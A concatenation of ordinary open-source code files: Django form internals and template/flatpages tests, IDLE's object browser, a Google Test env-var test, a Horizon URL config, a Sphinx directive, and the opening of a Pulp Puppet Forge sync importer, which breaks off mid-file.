from django.forms.fields import Field, FileField
# pretty_name is imported for backwards compatibility in Django 1.9
from django.forms.utils import ErrorDict, ErrorList, pretty_name # NOQA
from django.forms.widgets import Media, MediaDefiningClass
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils.html import conditional_escape, html_safe
from django.utils.safestring import mark_safe
from django.utils.translation import gettext as _
from .renderers import get_default_renderer
__all__ = ('BaseForm', 'Form')
class DeclarativeFieldsMetaclass(MediaDefiningClass):
"""Collect Fields declared on the base classes."""
def __new__(mcs, name, bases, attrs):
# Collect fields from current class.
current_fields = []
for key, value in list(attrs.items()):
if isinstance(value, Field):
current_fields.append((key, value))
attrs.pop(key)
attrs['declared_fields'] = OrderedDict(current_fields)
new_class = super(DeclarativeFieldsMetaclass, mcs).__new__(mcs, name, bases, attrs)
# Walk through the MRO.
declared_fields = OrderedDict()
for base in reversed(new_class.__mro__):
# Collect fields from base class.
if hasattr(base, 'declared_fields'):
declared_fields.update(base.declared_fields)
# Field shadowing.
for attr, value in base.__dict__.items():
if value is None and attr in declared_fields:
declared_fields.pop(attr)
new_class.base_fields = declared_fields
new_class.declared_fields = declared_fields
return new_class
@classmethod
def __prepare__(metacls, name, bases, **kwds):
# Remember the order in which form fields are defined.
return OrderedDict()
@html_safe
class BaseForm:
"""
The main implementation of all the Form logic. Note that this class is
different than Form. See the comments by the Form class for more info. Any
improvements to the form API should be made to this class, not to the Form
class.
"""
default_renderer = None
field_order = None
prefix = None
use_required_attribute = True
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=None,
empty_permitted=False, field_order=None, use_required_attribute=None, renderer=None):
self.is_bound = data is not None or files is not None
self.data = {} if data is None else data
self.files = {} if files is None else files
self.auto_id = auto_id
if prefix is not None:
self.prefix = prefix
self.initial = initial or {}
self.error_class = error_class
# Translators: This is the default suffix added to form field labels
self.label_suffix = label_suffix if label_suffix is not None else _(':')
self.empty_permitted = empty_permitted
self._errors = None # Stores the errors after clean() has been called.
# The base_fields class attribute is the *class-wide* definition of
# fields. Because a particular *instance* of the class might want to
# alter self.fields, we create self.fields here by copying base_fields.
# Instances should always modify self.fields; they should not modify
# self.base_fields.
self.fields = copy.deepcopy(self.base_fields)
self._bound_fields_cache = {}
self.order_fields(self.field_order if field_order is None else field_order)
if use_required_attribute is not None:
self.use_required_attribute = use_required_attribute
# Initialize form renderer. Use a global default if not specified
# either as an argument or as self.default_renderer.
if renderer is None:
if self.default_renderer is None:
renderer = get_default_renderer()
else:
renderer = self.default_renderer
if isinstance(self.default_renderer, type):
renderer = renderer()
self.renderer = renderer
def order_fields(self, field_order):
"""
Rearrange the fields according to field_order.
field_order is a list of field names specifying the order. Append fields
not included in the list in the default order for backward compatibility
with subclasses not overriding field_order. If field_order is None,
keep all fields in the order defined in the class. Ignore unknown
fields in field_order to allow disabling fields in form subclasses
without redefining ordering.
"""
if field_order is None:
return
fields = OrderedDict()
for key in field_order:
try:
fields[key] = self.fields.pop(key)
except KeyError: # ignore unknown fields
pass
fields.update(self.fields) # add remaining fields in original order
self.fields = fields
def __str__(self):
return self.as_table()
def __repr__(self):
if self._errors is None:
is_valid = "Unknown"
else:
is_valid = self.is_bound and not bool(self._errors)
return '<%(cls)s bound=%(bound)s, valid=%(valid)s, fields=(%(fields)s)>' % {
'cls': self.__class__.__name__,
'bound': self.is_bound,
'valid': is_valid,
'fields': ';'.join(self.fields),
}
def __iter__(self):
for name in self.fields:
yield self[name]
def __getitem__(self, name):
"""Return a BoundField with the given name."""
try:
field = self.fields[name]
except KeyError:
raise KeyError(
"Key '%s' not found in '%s'. Choices are: %s." % (
name,
self.__class__.__name__,
', '.join(sorted(f for f in self.fields)),
)
)
if name not in self._bound_fields_cache:
self._bound_fields_cache[name] = field.get_bound_field(self, name)
return self._bound_fields_cache[name]
@property
def errors(self):
"""Return an ErrorDict for the data provided for the form."""
if self._errors is None:
self.full_clean()
return self._errors
def is_valid(self):
"""Return True if the form has no errors, or False otherwise."""
return self.is_bound and not self.errors
def add_prefix(self, field_name):
"""
Return the field name with a prefix appended, if this Form has a
prefix set.
Subclasses may wish to override.
"""
return '%s-%s' % (self.prefix, field_name) if self.prefix else field_name
def add_initial_prefix(self, field_name):
"""Add a 'initial' prefix for checking dynamic initial values."""
return 'initial-%s' % self.add_prefix(field_name)
def _html_output(self, normal_row, error_row, row_ender, help_text_html, errors_on_separate_row):
"Output HTML. Used by as_table(), as_ul(), as_p()."
top_errors = self.non_field_errors() # Errors that should be displayed above all fields.
output, hidden_fields = [], []
for name, field in self.fields.items():
html_class_attr = ''
bf = self[name]
# Escape and cache in local variable.
bf_errors = self.error_class([conditional_escape(error) for error in bf.errors])
if bf.is_hidden:
if bf_errors:
top_errors.extend(
[_('(Hidden field %(name)s) %(error)s') % {'name': name, 'error': force_text(e)}
for e in bf_errors])
hidden_fields.append(str(bf))
else:
# Create a 'class="..."' attribute if the row should have any
# CSS classes applied.
css_classes = bf.css_classes()
if css_classes:
html_class_attr = ' class="%s"' % css_classes
if errors_on_separate_row and bf_errors:
output.append(error_row % force_text(bf_errors))
if bf.label:
label = conditional_escape(force_text(bf.label))
label = bf.label_tag(label) or ''
else:
label = ''
if field.help_text:
help_text = help_text_html % field.help_text
else:
help_text = ''
output.append(normal_row % {
'errors': bf_errors,
'label': label,
'field': bf,
'help_text': help_text,
'html_class_attr': html_class_attr,
'css_classes': css_classes,
'field_name': bf.html_name,
})
if top_errors:
output.insert(0, error_row % top_errors)
if hidden_fields: # Insert any hidden fields in the last row.
str_hidden = ''.join(hidden_fields)
if output:
last_row = output[-1]
# Chop off the trailing row_ender (e.g. '</td></tr>') and
# insert the hidden fields.
if not last_row.endswith(row_ender):
# This can happen in the as_p() case (and possibly others
# that users write): if there are only top errors, we may
# not be able to conscript the last row for our purposes,
# so insert a new, empty row.
last_row = (normal_row % {
'errors': '',
'label': '',
'field': '',
'help_text': '',
'html_class_attr': html_class_attr,
'css_classes': '',
'field_name': '',
})
output.append(last_row)
output[-1] = last_row[:-len(row_ender)] + str_hidden + row_ender
else:
# If there aren't any rows in the output, just append the
# hidden fields.
output.append(str_hidden)
return mark_safe('\n'.join(output))
def as_table(self):
"Return this form rendered as HTML <tr>s -- excluding the <table></table>."
return self._html_output(
normal_row='<tr%(html_class_attr)s><th>%(label)s</th><td>%(errors)s%(field)s%(help_text)s</td></tr>',
error_row='<tr><td colspan="2">%s</td></tr>',
row_ender='</td></tr>',
help_text_html='<br /><span class="helptext">%s</span>',
errors_on_separate_row=False)
def as_ul(self):
"Return this form rendered as HTML <li>s -- excluding the <ul></ul>."
return self._html_output(
normal_row='<li%(html_class_attr)s>%(errors)s%(label)s %(field)s%(help_text)s</li>',
error_row='<li>%s</li>',
row_ender='</li>',
help_text_html=' <span class="helptext">%s</span>',
errors_on_separate_row=False)
def as_p(self):
"Return this form rendered as HTML <p>s."
return self._html_output(
normal_row='<p%(html_class_attr)s>%(label)s %(field)s%(help_text)s</p>',
error_row='%s',
row_ender='</p>',
help_text_html=' <span class="helptext">%s</span>',
errors_on_separate_row=True)
def non_field_errors(self):
"""
Return an ErrorList of errors that aren't associated with a particular
field -- i.e., from Form.clean(). Return an empty ErrorList if there
are none.
"""
return self.errors.get(NON_FIELD_ERRORS, self.error_class(error_class='nonfield'))
def add_error(self, field, error):
"""
Update the content of `self._errors`.
The `field` argument is the name of the field to which the errors
should be added. If it's None, treat the errors as NON_FIELD_ERRORS.
The `error` argument can be a single error, a list of errors, or a
dictionary that maps field names to lists of errors. An "error" can be
either a simple string or an instance of ValidationError with its
message attribute set and a "list or dictionary" can be an actual
`list` or `dict` or an instance of ValidationError with its
`error_list` or `error_dict` attribute set.
If `error` is a dictionary, the `field` argument *must* be None and
errors will be added to the fields that correspond to the keys of the
dictionary.
"""
if not isinstance(error, ValidationError):
# Normalize to ValidationError and let its constructor
# do the hard work of making sense of the input.
error = ValidationError(error)
if hasattr(error, 'error_dict'):
if field is not None:
raise TypeError(
"The argument `field` must be `None` when the `error` "
"argument contains errors for multiple fields."
)
else:
error = error.error_dict
else:
error = {field or NON_FIELD_ERRORS: error.error_list}
for field, error_list in error.items():
if field not in self.errors:
if field != NON_FIELD_ERRORS and field not in self.fields:
raise ValueError(
"'%s' has no field named '%s'." % (self.__class__.__name__, field))
if field == NON_FIELD_ERRORS:
self._errors[field] = self.error_class(error_class='nonfield')
else:
self._errors[field] = self.error_class()
self._errors[field].extend(error_list)
if field in self.cleaned_data:
del self.cleaned_data[field]
def has_error(self, field, code=None):
if code is None:
return field in self.errors
if field in self.errors:
for error in self.errors.as_data()[field]:
if error.code == code:
return True
return False
def full_clean(self):
"""
Clean all of self.data and populate self._errors and self.cleaned_data.
"""
self._errors = ErrorDict()
if not self.is_bound: # Stop further processing.
return
self.cleaned_data = {}
# If the form is permitted to be empty, and none of the form data has
# changed from the initial data, short circuit any validation.
if self.empty_permitted and not self.has_changed():
return
self._clean_fields()
self._clean_form()
self._post_clean()
def _clean_fields(self):
for name, field in self.fields.items():
# value_from_datadict() gets the data from the data dictionaries.
# Each widget type knows how to retrieve its own data, because some
# widgets split data over several HTML fields.
if field.disabled:
value = self.get_initial_for_field(field, name)
else:
value = field.widget.value_from_datadict(self.data, self.files, self.add_prefix(name))
try:
if isinstance(field, FileField):
initial = self.get_initial_for_field(field, name)
value = field.clean(value, initial)
else:
value = field.clean(value)
self.cleaned_data[name] = value
if hasattr(self, 'clean_%s' % name):
value = getattr(self, 'clean_%s' % name)()
self.cleaned_data[name] = value
except ValidationError as e:
self.add_error(name, e)
def _clean_form(self):
try:
cleaned_data = self.clean()
except ValidationError as e:
self.add_error(None, e)
else:
if cleaned_data is not None:
self.cleaned_data = cleaned_data
def _post_clean(self):
"""
An internal hook for performing additional cleaning after form cleaning
is complete. Used for model validation in model forms.
"""
pass
def clean(self):
"""
Hook for doing any extra form-wide cleaning after Field.clean() has been
called on every field. Any ValidationError raised by this method will
not be associated with a particular field; it will have a special-case
association with the field named '__all__'.
"""
return self.cleaned_data
def has_changed(self):
"""Return True if data differs from initial."""
return bool(self.changed_data)
@cached_property
def changed_data(self):
data = []
for name, field in self.fields.items():
prefixed_name = self.add_prefix(name)
data_value = field.widget.value_from_datadict(self.data, self.files, prefixed_name)
if not field.show_hidden_initial:
# Use the BoundField's initial as this is the value passed to
# the widget.
initial_value = self[name].initial
else:
initial_prefixed_name = self.add_initial_prefix(name)
hidden_widget = field.hidden_widget()
try:
initial_value = field.to_python(hidden_widget.value_from_datadict(
self.data, self.files, initial_prefixed_name))
except ValidationError:
# Always assume data has changed if validation fails.
data.append(name)
continue
if field.has_changed(initial_value, data_value):
data.append(name)
return data
@property
def media(self):
"""Return all media required to render the widgets on this form."""
media = Media()
for field in self.fields.values():
media = media + field.widget.media
return media
def is_multipart(self):
"""
Return True if the form needs to be multipart-encoded, i.e. it has
FileInput, or False otherwise.
"""
for field in self.fields.values():
if field.widget.needs_multipart_form:
return True
return False
def hidden_fields(self):
"""
Return a list of all the BoundField objects that are hidden fields.
Useful for manual form layout in templates.
"""
return [field for field in self if field.is_hidden]
def visible_fields(self):
"""
Return a list of BoundField objects that aren't hidden fields.
The opposite of the hidden_fields() method.
"""
return [field for field in self if not field.is_hidden]
def get_initial_for_field(self, field, field_name):
"""
Return initial data for field on form. Use initial data from the form
or the field, in that order. Evaluate callable values.
"""
value = self.initial.get(field_name, field.initial)
if callable(value):
value = value()
return value
class Form(BaseForm, metaclass=DeclarativeFieldsMetaclass):
"A collection of Fields, plus their associated data."
# This is a separate class from BaseForm in order to abstract the way
# self.fields is specified. This class (Form) is the one that does the
# fancy metaclass stuff purely for the semantic sugar -- it allows one
# to define a form using declarative syntax.
# BaseForm itself has no way of designating self.fields.
|
kerr-huang/SL4A
|
refs/heads/master
|
python/src/Lib/idlelib/ObjectBrowser.py
|
67
|
# XXX TO DO:
# - popup menu
# - support partial or total redisplay
# - more doc strings
# - tooltips
# object browser
# XXX TO DO:
# - for classes/modules, add "open source" to object browser
from TreeWidget import TreeItem, TreeNode, ScrolledCanvas
from repr import Repr
myrepr = Repr()
myrepr.maxstring = 100
myrepr.maxother = 100
class ObjectTreeItem(TreeItem):
def __init__(self, labeltext, object, setfunction=None):
self.labeltext = labeltext
self.object = object
self.setfunction = setfunction
def GetLabelText(self):
return self.labeltext
def GetText(self):
return myrepr.repr(self.object)
def GetIconName(self):
if not self.IsExpandable():
return "python"
def IsEditable(self):
return self.setfunction is not None
def SetText(self, text):
try:
value = eval(text)
self.setfunction(value)
except:
pass
else:
self.object = value
def IsExpandable(self):
return not not dir(self.object)
def GetSubList(self):
keys = dir(self.object)
sublist = []
for key in keys:
try:
value = getattr(self.object, key)
except AttributeError:
continue
item = make_objecttreeitem(
str(key) + " =",
value,
lambda value, key=key, object=self.object:
setattr(object, key, value))
sublist.append(item)
return sublist
class InstanceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
sublist.insert(0,
make_objecttreeitem("__class__ =", self.object.__class__))
return sublist
class ClassTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
if len(self.object.__bases__) == 1:
item = make_objecttreeitem("__bases__[0] =",
self.object.__bases__[0])
else:
item = make_objecttreeitem("__bases__ =", self.object.__bases__)
sublist.insert(0, item)
return sublist
class AtomicObjectTreeItem(ObjectTreeItem):
def IsExpandable(self):
return 0
class SequenceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return len(self.object) > 0
def keys(self):
return range(len(self.object))
def GetSubList(self):
sublist = []
for key in self.keys():
try:
value = self.object[key]
except KeyError:
continue
def setfunction(value, key=key, object=self.object):
object[key] = value
item = make_objecttreeitem("%r:" % (key,), value, setfunction)
sublist.append(item)
return sublist
class DictTreeItem(SequenceTreeItem):
def keys(self):
keys = self.object.keys()
try:
keys.sort()
except:
pass
return keys
from types import *
dispatch = {
IntType: AtomicObjectTreeItem,
LongType: AtomicObjectTreeItem,
FloatType: AtomicObjectTreeItem,
StringType: AtomicObjectTreeItem,
TupleType: SequenceTreeItem,
ListType: SequenceTreeItem,
DictType: DictTreeItem,
InstanceType: InstanceTreeItem,
ClassType: ClassTreeItem,
}
def make_objecttreeitem(labeltext, object, setfunction=None):
t = type(object)
if dispatch.has_key(t):
c = dispatch[t]
else:
c = ObjectTreeItem
return c(labeltext, object, setfunction)
# Test script
def _test():
import sys
from Tkinter import Tk
root = Tk()
root.configure(bd=0, bg="yellow")
root.focus_set()
sc = ScrolledCanvas(root, bg="white", highlightthickness=0, takefocus=1)
sc.frame.pack(expand=1, fill="both")
item = make_objecttreeitem("sys", sys)
node = TreeNode(sc.canvas, None, item)
node.update()
root.mainloop()
if __name__ == '__main__':
_test()
|
lukaspj/Torque6
|
refs/heads/master
|
src/testing/googleTest/test/gtest_env_var_test.py
|
2408
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly parses environment variables."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name == 'nt'
IS_LINUX = os.name == 'posix' and os.uname()[0] == 'Linux'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_env_var_test_')
environ = os.environ.copy()
def AssertEq(expected, actual):
if expected != actual:
print 'Expected: %s' % (expected,)
print ' Actual: %s' % (actual,)
raise AssertionError
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
def GetFlag(flag):
"""Runs gtest_env_var_test_ and returns its output."""
args = [COMMAND]
if flag is not None:
args += [flag]
return gtest_test_utils.Subprocess(args, env=environ).output
def TestFlag(flag, test_val, default_val):
"""Verifies that the given flag is affected by the corresponding env var."""
env_var = 'GTEST_' + flag.upper()
SetEnvVar(env_var, test_val)
AssertEq(test_val, GetFlag(flag))
SetEnvVar(env_var, None)
AssertEq(default_val, GetFlag(flag))
class GTestEnvVarTest(gtest_test_utils.TestCase):
def testEnvVarAffectsFlag(self):
"""Tests that environment variable should affect the corresponding flag."""
TestFlag('break_on_failure', '1', '0')
TestFlag('color', 'yes', 'auto')
TestFlag('filter', 'FooTest.Bar', '*')
TestFlag('output', 'xml:tmp/foo.xml', '')
TestFlag('print_time', '0', '1')
TestFlag('repeat', '999', '1')
TestFlag('throw_on_failure', '1', '0')
TestFlag('death_test_style', 'threadsafe', 'fast')
TestFlag('catch_exceptions', '0', '1')
if IS_LINUX:
TestFlag('death_test_use_fork', '1', '0')
TestFlag('stack_trace_depth', '0', '100')
if __name__ == '__main__':
gtest_test_utils.Main()
|
hybrideagle/django
|
refs/heads/master
|
tests/template_tests/filter_tests/test_striptags.py
|
324
|
from django.template.defaultfilters import striptags
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class StriptagsTests(SimpleTestCase):
@setup({'striptags01': '{{ a|striptags }} {{ b|striptags }}'})
def test_striptags01(self):
output = self.engine.render_to_string(
'striptags01',
{
'a': '<a>x</a> <p><b>y</b></p>',
'b': mark_safe('<a>x</a> <p><b>y</b></p>'),
},
)
self.assertEqual(output, 'x y x y')
@setup({'striptags02': '{% autoescape off %}{{ a|striptags }} {{ b|striptags }}{% endautoescape %}'})
def test_striptags02(self):
output = self.engine.render_to_string(
'striptags02',
{
'a': '<a>x</a> <p><b>y</b></p>',
'b': mark_safe('<a>x</a> <p><b>y</b></p>'),
},
)
self.assertEqual(output, 'x y x y')
class FunctionTests(SimpleTestCase):
def test_strip(self):
self.assertEqual(
striptags('some <b>html</b> with <script>alert("You smell")</script> disallowed <img /> tags'),
'some html with alert("You smell") disallowed tags',
)
def test_non_string_input(self):
self.assertEqual(striptags(123), '123')
|
GinnyN/Team-Fortress-RPG-Generators
|
refs/heads/master
|
build/lib/django/contrib/flatpages/tests/views.py
|
77
|
import os
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.flatpages.models import FlatPage
from django.test import TestCase
class FlatpageViewTests(TestCase):
fixtures = ['sample_flatpages']
urls = 'django.contrib.flatpages.tests.urls'
def setUp(self):
self.old_MIDDLEWARE_CLASSES = settings.MIDDLEWARE_CLASSES
flatpage_middleware_class = 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware'
if flatpage_middleware_class in settings.MIDDLEWARE_CLASSES:
settings.MIDDLEWARE_CLASSES = tuple(m for m in settings.MIDDLEWARE_CLASSES if m != flatpage_middleware_class)
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(
os.path.dirname(__file__),
'templates'
),
)
self.old_LOGIN_URL = settings.LOGIN_URL
settings.LOGIN_URL = '/accounts/login/'
def tearDown(self):
settings.MIDDLEWARE_CLASSES = self.old_MIDDLEWARE_CLASSES
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
settings.LOGIN_URL = self.old_LOGIN_URL
def test_view_flatpage(self):
"A flatpage can be served through a view"
response = self.client.get('/flatpage_root/flatpage/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<p>Isn't it flat!</p>")
def test_view_non_existent_flatpage(self):
"A non-existent flatpage raises 404 when served through a view"
response = self.client.get('/flatpage_root/no_such_flatpage/')
self.assertEqual(response.status_code, 404)
def test_view_authenticated_flatpage(self):
"A flatpage served through a view can require authentication"
response = self.client.get('/flatpage_root/sekrit/')
self.assertRedirects(response, '/accounts/login/?next=/flatpage_root/sekrit/')
User.objects.create_user('testuser', 'test@example.com', 's3krit')
self.client.login(username='testuser',password='s3krit')
response = self.client.get('/flatpage_root/sekrit/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<p>Isn't it sekrit!</p>")
def test_fallback_flatpage(self):
"A fallback flatpage won't be served if the middleware is disabled"
response = self.client.get('/flatpage/')
self.assertEqual(response.status_code, 404)
def test_fallback_non_existent_flatpage(self):
"A non-existent flatpage won't be served if the fallback middlware is disabled"
response = self.client.get('/no_such_flatpage/')
self.assertEqual(response.status_code, 404)
def test_view_flatpage_special_chars(self):
"A flatpage with special chars in the URL can be served through a view"
fp = FlatPage.objects.create(
url="/some.very_special~chars-here/",
title="A very special page",
content="Isn't it special!",
enable_comments=False,
registration_required=False,
)
fp.sites.add(settings.SITE_ID)
response = self.client.get('/flatpage_root/some.very_special~chars-here/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<p>Isn't it special!</p>")
class FlatpageViewAppendSlashTests(TestCase):
fixtures = ['sample_flatpages']
urls = 'django.contrib.flatpages.tests.urls'
def setUp(self):
self.old_MIDDLEWARE_CLASSES = settings.MIDDLEWARE_CLASSES
flatpage_middleware_class = 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware'
if flatpage_middleware_class in settings.MIDDLEWARE_CLASSES:
settings.MIDDLEWARE_CLASSES = tuple(m for m in settings.MIDDLEWARE_CLASSES if m != flatpage_middleware_class)
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(
os.path.dirname(__file__),
'templates'
),
)
self.old_LOGIN_URL = settings.LOGIN_URL
settings.LOGIN_URL = '/accounts/login/'
self.old_APPEND_SLASH = settings.APPEND_SLASH
settings.APPEND_SLASH = True
def tearDown(self):
settings.MIDDLEWARE_CLASSES = self.old_MIDDLEWARE_CLASSES
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
settings.LOGIN_URL = self.old_LOGIN_URL
settings.APPEND_SLASH = self.old_APPEND_SLASH
def test_redirect_view_flatpage(self):
"A flatpage can be served through a view and should add a slash"
response = self.client.get('/flatpage_root/flatpage')
self.assertRedirects(response, '/flatpage_root/flatpage/', status_code=301)
def test_redirect_view_non_existent_flatpage(self):
"A non-existent flatpage raises 404 when served through a view and should not add a slash"
response = self.client.get('/flatpage_root/no_such_flatpage')
self.assertEqual(response.status_code, 404)
def test_redirect_fallback_flatpage(self):
"A fallback flatpage won't be served if the middleware is disabled and should not add a slash"
response = self.client.get('/flatpage')
self.assertEqual(response.status_code, 404)
def test_redirect_fallback_non_existent_flatpage(self):
"A non-existent flatpage won't be served if the fallback middlware is disabled and should not add a slash"
response = self.client.get('/no_such_flatpage')
self.assertEqual(response.status_code, 404)
def test_redirect_view_flatpage_special_chars(self):
"A flatpage with special chars in the URL can be served through a view and should add a slash"
fp = FlatPage.objects.create(
url="/some.very_special~chars-here/",
title="A very special page",
content="Isn't it special!",
enable_comments=False,
registration_required=False,
)
fp.sites.add(1)
response = self.client.get('/flatpage_root/some.very_special~chars-here')
self.assertRedirects(response, '/flatpage_root/some.very_special~chars-here/', status_code=301)
|
dan1/horizon-x509
|
refs/heads/master
|
openstack_dashboard/dashboards/admin/overview/urls.py
|
66
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import patterns
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.overview import views
urlpatterns = patterns(
'',
url(r'^$', views.GlobalOverview.as_view(), name='index'),
)
|
codio-packs/symfony
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/_exts/configurationblock.py
|
2577
|
#Copyright (c) 2010 Fabien Potencier
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
from docutils.parsers.rst import Directive, directives
from docutils import nodes
from string import upper
class configurationblock(nodes.General, nodes.Element):
pass
class ConfigurationBlock(Directive):
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
formats = {
'html': 'HTML',
'xml': 'XML',
'php': 'PHP',
'yaml': 'YAML',
'jinja': 'Twig',
'html+jinja': 'Twig',
'jinja+html': 'Twig',
'php+html': 'PHP',
'html+php': 'PHP',
'ini': 'INI',
'php-annotations': 'Annotations',
}
def run(self):
env = self.state.document.settings.env
node = nodes.Element()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
entries = []
for i, child in enumerate(node):
if isinstance(child, nodes.literal_block):
# add a title (the language name) before each block
#targetid = "configuration-block-%d" % env.new_serialno('configuration-block')
#targetnode = nodes.target('', '', ids=[targetid])
#targetnode.append(child)
innernode = nodes.emphasis(self.formats[child['language']], self.formats[child['language']])
para = nodes.paragraph()
para += [innernode, child]
entry = nodes.list_item('')
entry.append(para)
entries.append(entry)
resultnode = configurationblock()
resultnode.append(nodes.bullet_list('', *entries))
return [resultnode]
def visit_configurationblock_html(self, node):
self.body.append(self.starttag(node, 'div', CLASS='configuration-block'))
def depart_configurationblock_html(self, node):
self.body.append('</div>\n')
def visit_configurationblock_latex(self, node):
pass
def depart_configurationblock_latex(self, node):
pass
def setup(app):
app.add_node(configurationblock,
html=(visit_configurationblock_html, depart_configurationblock_html),
latex=(visit_configurationblock_latex, depart_configurationblock_latex))
app.add_directive('configuration-block', ConfigurationBlock)
|
jeremycline/pulp_puppet
|
refs/heads/master
|
pulp_puppet_plugins/pulp_puppet/plugins/importers/forge.py
|
1
|
from datetime import datetime
from gettext import gettext as _
import logging
import os
import shutil
import sys
from pulp.common.util import encode_unicode
from pulp.server.db.model.criteria import UnitAssociationCriteria
from pulp_puppet.common import constants
from pulp_puppet.common.constants import (STATE_FAILED, STATE_RUNNING,
STATE_SUCCESS, STATE_CANCELED)
from pulp_puppet.common.model import RepositoryMetadata, Module
from pulp_puppet.common.sync_progress import SyncProgressReport
from pulp_puppet.plugins.importers import metadata as metadata_module
from pulp_puppet.plugins.importers.downloaders import factory as downloader_factory
_logger = logging.getLogger(__name__)
class SynchronizeWithPuppetForge(object):
"""
Used to perform a single sync of a puppet repository. This class will
maintain state relevant to the run and should not be reused across runs.
"""
def __init__(self, repo, sync_conduit, config):
self.repo = repo
self.sync_conduit = sync_conduit
self.config = config
self.progress_report = SyncProgressReport(sync_conduit)
self.downloader = None
# Since SynchronizeWithPuppetForge creats a Nectar downloader for each unit, we cannot
# rely on telling the current downloader to cancel. Therefore, we need another state tracker
# to check in the download units loop.
self._canceled = False
def __call__(self):
"""
Performs the sync operation according to the configured state of the
instance. The report to be sent back to Pulp is returned from this
call. This call will make calls into the conduit's progress update
as appropriate.
This call executes serially. No threads are created by this call. It
will not return until either a step fails or the entire sync is
completed.
:return: the report object to return to Pulp from the sync call
:rtype: SyncProgressReport
"""
_logger.info('Beginning sync for repository <%s>' % self.repo.id)
# quit now if there is no feed URL defined
if not self.config.get(constants.CONFIG_FEED):
self.progress_report.metadata_state = STATE_FAILED
self.progress_report.metadata_error_message = _(
'Cannot perform repository sync on a repository with no feed')
self.progress_report.update_progress()
return self.progress_report.build_final_report()
try:
metadata = self._parse_metadata()
if not metadata:
report = self.progress_report.build_final_report()
return report
self._import_modules(metadata)
finally:
# One final progress update before finishing
self.progress_report.update_progress()
return self.progress_report
def cancel(self):
"""
Cancel an in-progress sync, if there is one.
"""
